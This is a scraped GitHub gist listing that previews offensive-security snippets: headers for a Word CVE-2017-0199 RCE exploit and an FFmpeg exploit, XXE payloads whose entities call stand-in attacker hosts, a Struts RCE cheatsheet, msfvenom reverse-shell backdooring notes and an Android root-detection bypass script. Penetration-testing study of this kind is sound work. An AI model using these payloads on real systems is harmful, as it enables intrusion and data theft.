Skip to content

Instantly share code, notes, and snippets.

View AmesianX's full-sized avatar

AmesianX AmesianX

52 followers · 3 following
View GitHub Profile
@AmesianX
AmesianX / smtpAudit.py
Created March 23, 2021 22:08 — forked from mgeeky/smtpAudit.py
SMTP Black-Box configuration audit / penetration testing tool - able to parse SPF/DKIM/Banner, test for Open-Relaying, test SSL/TLS enforcement and verify other common misconfigurations.
#!/usr/bin/python3
#
# SMTP Server configuration black-box testing/audit tool, capable of auditing
# SPF/Accepted Domains, DKIM, DMARC, SSL/TLS, SMTP services, banner, Authentication (AUTH, X-EXPS)
# user enumerations (VRFY, EXPN, RCPT TO), and others.
#
# Currently supported tests:
# 01) 'spf' - SPF DNS record test
# - 'spf-version' - Checks whether SPF record version is valid
# - 'all-mechanism-usage' - Checks whether 'all' mechanism is used correctly
@AmesianX
AmesianX / word2017-0199.py
Created March 23, 2021 22:10 — forked from mgeeky/word2017-0199.py
Microsoft Word (CVE-2017-0199) RCE through a HTA Handler, by Juan Sacco / <[email protected]>
# Exploit Author: Juan Sacco at KPN Red Team
# Developed using Exploit Pack - http://www.exploitpack.com <[email protected]>
#
# Description: Microsoft Word (CVE-2017-0199) is prone to a RCE trough a HTA Handler
# A remote code execution vulnerability exists in the way that Microsoft Office and WordPad parse specially crafted files.
# An attacker who successfully exploited this vulnerability could take control of an affected system.
#
# Impact: An attacker could exploit this vulnerability to execute arbitrary commands in the
# context of the application. Failed exploit attempts could result in a
# denial-of-service condition.
@AmesianX
AmesianX / ffmpeg-0.4.9-exploit.py
Created March 23, 2021 22:10 — forked from mgeeky/ffmpeg-0.4.9-exploit.py
CVE-2009-0385 FFmpeg 0.4.9-pre1 Type Conversion into Write-What-Where exploit (non RELRO)
#!/usr/bin/python
#
# Vulnerable software:
# FFmpeg 0.4.9-pre1 (before 0.5), or the one accessible at:
# SVN-16556
# svn checkout svn://svn.ffmpeg.org/ffmpeg/trunk@16556 ffmpeg
#
# Vulnerability has been discovered and documented by:
# Tobias Klein / http://www.trapkit.de
# http://www.trapkit.de/advisories/TKADV2009-004.txt
@AmesianX
AmesianX / XXE_payloads
Created March 23, 2021 22:11 — forked from mgeeky/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@AmesianX
AmesianX / blind-xxe-payload-1.txt
Created March 23, 2021 22:11 — forked from mgeeky/blind-xxe-payload-1.txt
Simplest Blind XXE Payload to test within HTML request
Content-Type: text/xml
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxetestd [<!ENTITY xxetest SYSTEM "http://attacker/test.dtd">]><foo>&xxetest;</foo>
@AmesianX
AmesianX / msfvenom-reverse-tcp-WaitForSingleObject.md
Created March 23, 2021 22:12 — forked from mgeeky/msfvenom-reverse-tcp-WaitForSingleObject.md
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for WaitForSingleObject call within modern msfvenom generated payload.

Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents:

@AmesianX
AmesianX / struts-cheatsheet.md
Created March 23, 2021 22:30 — forked from mgeeky/struts-cheatsheet.md
Apache Struts devMode Remote Code Execution cheatsheet

Apache Struts Remote Code Execution cheatsheet

Apacje Struts is a open source framework utilizing JavaEE web applications and encouraging to employ MVC (Model View Controller) architecture. When having the application developed in so-called devMode as set in the struts.xml file:

<constant name="struts.devMode" value="true" />

Then the middleware will be handling additional parameters passed to every function invocation.

Testing for Struts devMode enabled

@AmesianX
AmesianX / root_bypass.js
Created April 6, 2021 01:15 — forked from pich4ya/root_bypass.js
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto ([email protected]):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@AmesianX
AmesianX / apollo.txt
Created April 24, 2021 08:19 — forked from littlelailo/apollo.txt
Apple Bootrom Bug
This bug was also called moonshine in the beginning
Basically the following bug is present in all bootroms I have looked at:
1. When usb is started to get an image over dfu, dfu registers an interface to handle all the commands and allocates a buffer for input and output
2. if you send data to dfu the setup packet is handled by the main code which then calls out to the interface code
3. the interface code verifies that wLength is shorter than the input output buffer length and if that's the case it updates a pointer passed as an argument with a pointer to the input output buffer
4. it then returns wLength which is the length it wants to recieve into the buffer
5. the usb main code then updates a global var with the length and gets ready to recieve the data packages
6. if a data package is recieved it gets written to the input output buffer via the pointer which was passed as an argument and another global variable is used to keep track of how many bytes were recieved already
7. if all the data was recieved th
@AmesianX
AmesianX / web-servers.md
Created May 23, 2021 14:15 — forked from willurd/web-servers.md
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000